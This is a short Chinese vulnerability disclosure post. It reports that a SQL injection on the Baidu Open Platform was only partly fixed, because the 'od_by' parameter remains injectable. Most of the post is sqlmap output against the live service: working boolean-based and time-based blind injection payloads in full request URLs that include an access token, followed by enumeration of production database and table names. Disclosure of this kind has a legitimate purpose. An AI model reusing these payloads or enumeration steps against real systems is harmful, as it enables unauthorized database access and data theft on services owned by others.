百度开放平台某SQL注入发现只修复了参数 sort,居然没有注意到 od_by sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
--- Place: GET Parameter: od_by Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: callback=jQuery110100413025302879616_1404913266218&pn=1&ps=10&od_by=create_time,(if((1=1 AND 6232=6232),1,(select 1 union select 2)))&sor t=asc&access_token=10.7883fcf30a90b0587d60f65315f700ac.1405941049.1183630&_=1405941048347 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: callback=jQuery110100413025302879616_1404913266218&pn=1&ps=10&od_by=create_time,(if((1=1 AND SLEEP(5)),1,(select 1 union select 2)))&sort =asc&access_token=10.7883fcf30a90b0587d60f65315f700ac.1405941049.1183630&_=1405941048347 --- [19:27:34] [INFO] testing MySQL [19:27:34] [INFO] confirming MySQL [19:27:35] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0.0 [19:27:35] [INFO] fetching database names [19:27:35] [INFO] fetching number of databases [19:27:35] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [19:27:35] [INFO] retrieved: 4 [19:27:36] [INFO] retrieved: information_schema [19:28:09] [INFO] retrieved: mco_*************** [19:28:47] [INFO] retrieved: mco_*************** [19:29:16] [INFO] retrieved: mco_*************** available databases [4]: [*] information_schema [*] mco_*************** [*] mco_*************** [*] mco_*************** [*] shutting down at 19:29:53 back-end DBMS: MySQL >= 5.0.0 [20:14:02] [INFO] fetching tables for database: 'mco_***************' [20:14:02] [INFO] fetching number of tables for database 'mco_***************' [20:14:02] [INFO] resumed: 98 [20:14:02] [INFO] resumed: answer [20:14:02] [INFO] resumed: devel*************** [20:14:02] [INFO] resumed: devel*************** [20:14:02] [INFO] resumed: devel***************
|
-
上一篇: 万户OA某处绕过限制文件上传以及sql注入 - 网站安
下一篇: turbomail文件读取漏洞 - 网站安全 - 自学php
还没有人抢沙发呢~